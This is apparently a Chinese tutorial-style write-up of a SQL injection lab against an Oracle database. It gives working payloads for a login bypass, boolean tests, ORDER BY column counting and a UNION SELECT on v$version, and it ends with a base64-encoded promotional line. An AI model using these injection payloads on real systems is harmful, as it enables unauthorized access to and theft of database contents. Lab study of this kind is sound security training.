分析网站示例cms系统开源
说到绕过登录,就想到万能密码,尝试 ' or 1=1--
lab3 SQL 注入攻击,查询 Oracle 数据库类型和版本
单引号报错
' and '1'='1
' and '1'='2 返回空,说明把输入当作 sql 语句执行了
开始用 order by 排序来找处这个表有几个字段
' order by 2--,返回内容
' order by 3-- 服务报错,说明不存在第三个字段
为方便理解,我直接在数据库演示下
表中有 5 个字段,order by 6 就报错了 ,--空格是注释,sql 语句末尾需要输入;,注释掉后系统提示我再次输入;结束输入
下面开始用到union select联合查询
使用联合查询必须先知道列数,否则报错
当输入一个不存在的数据时返回显示位
在Oracle数据库中进行SQL注入时,通常需要包含FROM dual子句,这是因为Oracle的语法要求SELECT语句必须指定一个表名。dual是Oracle内置的一个虚拟表,它只有一行一列(列名为DUMMY,值为X),主要用于满足语法规则
1' union select BANNER,'2' from v$version--
SELECT version FROM v$instance只返回版本号
SELECT banner FROM v$version,返回所请求的完整版本字符串。echo "QmlsaWJpbGkgc2VhcmNoICdQZW5UZXN0M3JfWmVybGsnIGZvciBtb3JlIHZpZGVvLCBUaGFuayB5
b3UgZm9yIHlvdXIgc3VwcG9ydCEK"|base64 -d